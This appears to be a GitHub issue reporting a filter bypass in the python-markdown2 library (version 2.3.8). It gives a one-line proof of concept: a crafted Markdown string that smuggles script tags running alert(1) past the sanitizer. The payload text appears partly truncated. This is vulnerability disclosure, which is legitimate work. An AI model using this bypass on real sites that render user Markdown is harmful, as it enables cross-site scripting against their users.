Filter bypass leading to XSS · Issue #341 · trentm/python-markdown2

Here is the a PoC for latest version (2.3.8) >>> import markdown2 >>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*]...</http://g<!s://g.c?<!-<[a\\*/</script></http://g<!s://q?<!-<[<script>
github.com github.com